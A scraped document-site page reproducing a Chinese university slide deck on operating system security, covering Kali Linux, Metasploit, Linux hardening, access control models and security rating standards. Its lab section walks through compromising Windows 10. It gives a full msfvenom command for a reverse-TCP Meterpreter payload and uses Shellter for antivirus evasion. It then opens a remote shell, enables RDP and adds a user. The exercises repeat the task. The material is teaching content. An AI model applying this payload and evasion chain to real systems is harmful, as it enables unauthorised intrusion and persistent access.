第4章操作系统安全技术.ppt

上传人:高校教****PT 文档编号:87431071 上传时间:2023-04-16 格式:PPT 页数:20 大小:4.78MB
返回 下载 相关 举报
第4章操作系统安全技术.ppt_第1页
第1页 / 共20页
第4章操作系统安全技术.ppt_第2页
第2页 / 共20页
点击查看更多>>
资源描述

《第4章操作系统安全技术.ppt》由会员分享,可在线阅读,更多相关《第4章操作系统安全技术.ppt(20页珍藏版)》请在taowenge.com淘文阁网|工程机械CAD图纸|机械工程制图|CAD装配图下载|SolidWorks_CaTia_CAD_UG_PROE_设计图分享下载上搜索。

1、1XXX 微信:XXX https:/ 微信:XXX https:/ 操作系统安全技术本章学习目标本章学习目标 掌握Metasploit的使用 初步了解Linux系统安全配置 了解Linux自主访问控制与强制访问控制的概念 了解计算机系统安全等级标准操作系统(Operating System)是一组面向机器和用户的程序,是用户程序和计算机硬件之间的接口,其目的是最大限度地、高效地、合理地使用计算机资源,同时对系统的所有资源(软件和硬件资源)进行管理。计算机系统的安全极大地取决于操作系统的安全,计算机操作系统的安全是利用安全手段防止操作系统本身被破坏,防止非法用户对计算机资源进行窃取。3XXX

2、微信:XXX https:/ 操作系统安全基础在计算机系统的各个层次上,硬件、操作系统、网络软件、数据库管理系统软件及应用软件在计算机安全中都肩负着重要的职责。在软件的范畴中,操作系统处在底层,是所有其他软件的基础,它在解决安全问题上也起着基础性、关键性的作用,没有操作系统的安全支持,计算机软件系统的安全就缺乏了根基。上层软件要想获得运行的可靠性和信息的完整性、保密性,必须依赖于操作系统提供的系统软件。在网络环境中,网络安全依赖于网络中各主机的安全性,而各主机系统的安全是由操作系统的安全性决定的。4XXX 微信:XXX https:/ Kali Linux黑客和安全研究员需要手边随时都有整套的

3、黑客工具,Kali Linux恰是他们所需的,Kali Linux预装了许多黑客工具,包括nmap、Wireshark、John the Ripper、Aircrack-ng等。Kali Linux是基于Debian的Linux发行版,专门设计用于数字取证和渗透测试。渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析。渗透测试流程可以归纳为:信息收集、漏洞发现、漏洞利用、维持访问。5XXX 微信:XXX https:/ MetasploitMetasploit是一款开源的安全漏洞检测工具,几乎包含了渗透测试中所有

4、用到的工具,每一种工具都有其对应的使用环境,针对性比较强。Metasploit可以帮助安全和IT专业人员识别安全性问题,验证漏洞的缓解措施。通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D.Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。它集成了各平台上常

5、见的溢出漏洞和流行的shellcode,并且不断更新。最新版本的MSF(Metasploit Framework Console)包含了1467种流行的操作系统及应用软件的漏洞,以及432个shellcode。作为安全工具,它在安全检测中有着不容忽视的作用,并为漏洞自动化探测和及时检测系统漏洞提供了有力的保障。Metasploit 包含了多种Exploit和Payload。6XXX 微信:XXX https:/ 实例入侵Windows 10图4.1 实验环境7XXX 微信:XXX https:/ 实例入侵Windows 10图4.2 三个系统的IP地址及其之间的网络连通性8XXX 微信:XXX

6、 https:/ 实例入侵Windows 102入侵过程入侵过程第第1步:步:执行msfvenom命令如图4.3所示,在Kali Linux终端窗口中执行如下命令:msfvenom-p windows/meterpreter/reverse_tcp-a x86 platform windows-f exe LHOST=192.168.56.101 LPORT=4444-o/root/kali2win10.exe图4.3 执行msfvenom命令9XXX 微信:XXX https:/ 实例入侵Windows 10图4.4 下载Shellter第第2步:步:下载并运行Shellter如图4.4所示

7、,在Kali Linux终端窗口中执行如下命令下载Shellter。10XXX 微信:XXX https:/ 实例入侵Windows 10图4.5 Shellter窗口如图4.4所示的最后一行,执行shellter命令,弹出如图4.5所示的窗口。11XXX 微信:XXX https:/ 实例入侵Windows 10图4.6 在终端执行msfconsole命令设置侦听器第第3步:步:攻击机上设置侦听器12XXX 微信:XXX https:/ 实例入侵Windows 10图4.7 启用管理员帐号第第4步:步:目标机上运行kali2win10.exe13XXX 微信:XXX https:/ 实例入侵

8、Windows 10图4.8 设置360杀毒软件,关闭文件系统实时防护功能,执行kali2win10.exe14XXX 微信:XXX https:/ 实例入侵Windows 10图4.9 攻击机上的Meterpreter会话15XXX 微信:XXX https:/ 实例入侵Windows 10图4.10 攻击机上获得目标机上的Windows shell,启用RDP,添加用户ztguang第第5步:步:攻击机上的Meterpreter会话在目标机双击kali2win10.exe文件导致有效负载被执行并反向TCP连接到攻击机,很快会在攻击机(Kali Linux)上收到一个Meterpreter会

9、话。如图4.9所示,通过“meterpreter”提示符可以证明这一点。第6步:攻击机上获得Windows shell16XXX 微信:XXX https:/ 实例入侵Windows 10图4.11 远程桌面连接第第7步:步:攻击机安装RemminaRemmina是一个用GTK+编写的远程桌面客户端,提供了RDP、VNC、XDMCP、SSH等远程连接协议的支持。Remmina方便易用,创建远程连接的界面与Windows自带的远程桌面十分相近。在攻击机(Kali Linux终端)执行命令apt install remmina安装Remmina。第第8步:步:在攻击机远程桌面连接目标机在攻击机(K

10、ali Linux终端)执行命令 remmina启动Remmina远程桌面客户端。输入目标机的IP地址(192.168.56.104)和用户名(ztguang),单击“确定”按钮,成功获得目标机的桌面,如图4.11所示。17XXX 微信:XXX https:/ 实例Linux系统安全配置对于公认的具有很高稳定性的Linux操作系统来说,如果没有很好的安全设置,那么,也会较容易地被网络黑客入侵。下面从账号安全管理、存取访问控制、资源安全管理和网络安全管理4个方面对Linux系统的安全设置进行初步、简单的介绍。本节介绍的内容基于Redhat Linux/CentOS/Fedora。4.5.1 账号

11、安全管理账号安全管理1使用su、sudo命令2删除所有的特殊账户3修改默认密码长度4修改口令文件属性4.5.2 存取访问控制存取访问控制4.5.3 资源安全管理4.5.4 网络安全管理18XXX 微信:XXX https:/ Linux自主访问控制与强制访问控制安全系统在原有Linux操作系统的基础上,新增了强制访问控制、最小特权管理、可信路径、隐通道分析和加密卡支持等功能组成,系统的主要功能如下。1标识与鉴别标识与鉴别 包括角色管理、用户管理和用户身份鉴别3部分。2自主访问控制自主访问控制 本系统在自主访问控制中加入ACL机制。3强制访问控制强制访问控制 提供基于数据保密性的资源存取控制方法

12、,提供了比DAC(Discretionary Access Control)更严格的访问约束。4SELinux传统Linux的不足:存在特权用户root,对于文件访问权的划分不够细,SUID程序的权限升级,DAC问题。对于这些不足,防火墙和入侵检测系统都无能为力。在这种背景下,出现了SELinux。SELinux(Security-Enhanced Linux)是美国国家安全局(NAS)对于强制访问控制(MAC)的一种实现,在这种强制访问控制体系下,进程只能访问那些在它的任务中所需要的文件。SELinux在类型强制服务器中,合并了多级安全性或一种可选的多类策略,并采用了基于角色的访问控制概念。

13、19XXX 微信:XXX https:/ 安全等级标准下面介绍几种信息安全评估标准:ISO安全体系结构标准、美国可信计算机系统安全评价标准和中国国家标准计算机信息系统安全保护等级划分准则。4.7.1 ISO安全体系结构标准安全体系结构标准在安全体系结构方面,ISO制定了国际标准ISO7498-21989信息处理系统开放系统互连基本参考模型 第2部分 安全体系结构。该标准为开放系统互连(OSI)描述了基本参考模型,为协调开发现有的与未来的系统互连标准建立起了一个框架。其任务是提供安全服务与有关机制的一般描述,确定在参考模型内部可以提供这些服务与机制的位置。4.7.2 美国可信计算机安全评价标准美

14、国可信计算机安全评价标准20世纪80年代,美国国防部根据军用计算机系统的安全需要,制定了可信计算机系统安全评价标准(Trusted Computer System Evaluation Criteria,TCSEC)。4.7.3 中国国家标准计算机信息安全保护等级划分准则中国国家标准计算机信息安全保护等级划分准则中国公安部主持制定,国家技术标准局发布的中华人民共和国国家标准GB178951999计算机信息系统安全保护等级划分准则于2001年1月1日起实施。该准则将信息系统安全分为5个等级,分别是:用户自主保护级、系统审计保护级、安全标记保护级、结构化保护级和访问验证保护级。主要的安全考核指标有

15、身份认证、自主访问控制、数据完整性、审计、隐蔽信道分析、客体重用、强制访问控制、安全标记、可信路径和可信恢复等,这些指标涵盖了不同级别的安全要求。20XXX 微信:XXX https:/ 题 41填空题填空题(1)是一组面向机器和用户的程序,是用户程序和计算机硬件之间的接口,其目的是最大限度地、高效地、合理地使用计算机资源,同时对系统的所有资源(软件和硬件资源)进行管理。(2)在计算机系统的各个层次上,硬件、数据库管理系统软件及应用软件,各自在计算机安全中都肩负着重要的职责。(3)黑客和安全研究员需要手边随时都有整套的黑客工具,恰是他们所需的,其预装了许多黑客工具,包括nmap、Wireshark、John the Ripper、Aircrack-ng等。(4)是一款开源的安全漏洞检测工具,几乎包含了渗透测试中所有用到的工具,每一种工具都有其对应的使用环境,针对性比较强。2思考与简答题思考与简答题(1)简述操作系统的安全级别。(2)Linux系统的安全配置有哪些方面?(3)简述TCSEC。3上机题上机题(1)根据4.4节,搭建实验环境,使用Metasploit入侵Windows 10 1703英文企业版。(2)读者尝试使用Metasploit入侵Windows 10中文版。

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 教育专区 > 大学资料

本站为文档C TO C交易模式,本站只提供存储空间、用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。本站仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知淘文阁网,我们立即给予删除!客服QQ:136780468 微信:18945177775 电话:18904686070

工信部备案号:黑ICP备15003705号© 2020-2023 www.taowenge.com 淘文阁